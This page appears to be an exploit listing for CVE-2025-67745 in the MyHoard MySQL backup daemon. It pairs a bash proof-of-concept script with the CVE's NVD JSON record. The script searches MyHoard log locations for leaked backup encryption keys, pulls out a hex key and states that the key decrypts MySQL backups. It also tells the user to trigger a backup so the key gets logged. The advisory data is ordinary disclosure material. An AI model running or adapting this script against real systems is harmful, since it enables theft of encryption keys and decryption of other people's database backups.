CVE-2025-67745

#!/bin/bash # CVE-2025-67745 PoC - MyHoard Encryption Key Leak # This PoC demonstrates how to extract encryption keys from MyHoard logs TARGET_HOST="${TARGET_HOST:-localhost}" LOG_FILE="/var/log/myhoard/myhoard.log" # Step 1: Check if MyHoard logs are accessible echo "[*] Checking MyHoard log access..." if [ ! -r "$LOG_FILE" ]; then echo "[-] Log file not accessible. Try alternative locations:" echo " - /var/log/myhoard/" echo " - /tmp/myhoard.log" echo " - ~/.myhoard/logs/" exit 1 fi # Step 2: Search for encryption keys in logs echo "[*] Searching for backup encryption keys..." ENCRYPTION_KEYS=$(grep -E '(encryption_key|encryptionKey|AES|backup_key)' "$LOG_FILE" 2>/dev/null) if [ -z "$ENCRYPTION_KEYS" ]; then echo "[-] No encryption keys found in current logs" echo "[*] Try triggering a backup operation first:" echo " myhoard --backup --database=test_db" exit 1 fi # Step 3: Extract and display keys echo "[+] Found potential encryption keys:" echo "$ENCRYPTION_KEYS" | while read line; do echo " $line" done # Step 4: Verify key validity echo "[*] Validating key format..." KEY=$(echo "$ENCRYPTION_KEYS" | head -1 | grep -oE '[a-fA-F0-9]{32,}' | head -1) if [ ! -z "$KEY" ]; then echo "[+] Valid encryption key extracted: $KEY" echo "[!] This key can be used to decrypt MySQL backups" fi

{"cve": {"id": "CVE-2025-67745", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:35.040", "lastModified": "2026-03-05T19:22:55.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyHoard is a daemon for creating, managing and restoring MySQL backups. Starting in version 1.0.1 and prior to version 1.3.0, in some cases, myhoard logs the whole backup info, including the encryption key. Version 1.3.0 fixes the issue. As a workaround, direct logs into /dev/null."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-402"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aiven:myhoard:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.1", "versionEndExcluding": "1.3.0", "matchCriteriaId": "403F20C0-652E-4BBF-AAB6-D11AF2E3775B"}]}]}], "references": [{"url": "https://github.com/Aiven-Open/myhoard/commit/fac89793bfc8c81ae040aadf5292f5d0100b6640", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Aiven-Open/myhoard/security/advisories/GHSA-v42r-6hr9-4hcr", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}